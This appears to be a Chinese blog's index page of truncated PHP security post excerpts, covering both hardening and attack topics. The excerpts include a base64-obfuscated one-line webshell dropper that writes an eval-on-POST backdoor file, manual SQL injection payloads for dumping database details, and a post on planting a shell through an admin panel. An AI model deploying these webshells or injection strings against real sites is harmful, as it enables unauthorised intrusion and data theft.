浅谈PHP可变变量安全

本来想写篇长点的文档的,后来想想这个东西已经被各路牛人实战得无比纯熟了,所以我就只简单的说一下这个东西。 记得我刚接触PHP安全的时候,问几位大牛怎么入门,他们总是和我说去看PHP手册吧,安全就是基础。 没错,我要说的东西在PHP手册里就有非常详细的说明:.net/manual/zh/language.variables.variable.php">http://php.net/manual...

- 阅读全文 -

破解php代码混淆加密的程序

代码混淆加密——虽然是雕虫小技的加密方式,但手工解出来还是蛮费时间,尤其是有一大堆加密程序的时候。 今天兴致还不错,写了个php解密程序,解密效果完美,批量解密也是一个爽! 注意:程序会在同目录生成和删除 tmp.php <?php /* * by 267014855 * 2011-7-18 */ //$file = 'global.func.php'; $hd = opendir('./'...

- 阅读全文 -

后台单独生成php页面拿shell

天群里一个鸟人丢个后台叫帮忙拿shell。一看是FCK,就各种去弄了...结果无功而返,PHP语言。过程就不说了,不是重点.后来在前台打开各种链接以及配合后台查看发现他的关于我们\招贤纳士只能的页面是独立的php页面.这就好办了。写个一句话即可。至于怎么写,我这就扯下。 看代码: <div id="con660"> <div> <h4>业务领域</h4&g...

- 阅读全文 -

简述Php脚本注入技术

Php的环境一般是apache+php+mysql,平常配置服务器一般是打开php.ini里的安全模式,将safe_mode设为on,还有就是将display_erors设为off,即关闭错误显示。还有一个非常重要的配置选项-----magic_quotes_gpc,高版本默认为on,以前的版本中默认为off。当magic_quotes_gpc为on的时候我们怎么防范php的字符变量注入呢?其实只...

- 阅读全文 -

关于Nginx+PHP的虚拟主机目录权限控制的探究

Nginx的使用者最近越来越多,很多大型网站也都从Apache或其他平台迁移到了Nginx。但在我使用Nginx的过程中有个问题一直未得到解决,就是如何限制Nginx+PHP的目录权限 我们知道,在Apache中可以很容易的对虚拟目录进行权限控制,如: <VirtualHost www.xpb.cn> ServerAdmin xiaopb@live.com DocumentRoot /...

- 阅读全文 -

nginx+fastcgi+php安全虚拟主机隔离配制方法

网上关于nginx +fastcgi+php 虚拟主机独立站点安全配置文章很多。 其中 关于Nginx+PHP的虚拟主机目录权限控制的探究 文章已经讲的很详细了。方法很多,有设置http://www.cnblogs.com/http://www.cnblogs.com/ 特殊目录的,有通过open_basedir配制独立站点,独立目录的。 还有将所有站点目录都写在open_basedir里面。只是...

- 阅读全文 -

PHP+MySQL 手工注入语句

暴字段长度 order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用): and 1=2 union all select ver...

- 阅读全文 -

PHP一句话变型

<?php @fputs(fopen(base64_decode(bG9zdC5waHA=),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==));?> <script language="php">@fputs(fopen(base64_decode(bG9zdC5waHA=),w),bas...

- 阅读全文 -

(老文章)PHP程序漏洞产生的原因和防范方法

滥用include 1.漏洞原因: Include是编写PHP网站中最常用的函数,并且支持相对路径。有很多PHP脚本直接把某输入变量作为Include的参数,造成任意引用脚本、绝对路径泄露等漏洞。看以下代码: ... $includepage=$_GET["includepage"]; include($includepage); ... 很明显,我们只需要提交不同的Includepage变量就可...

- 阅读全文 -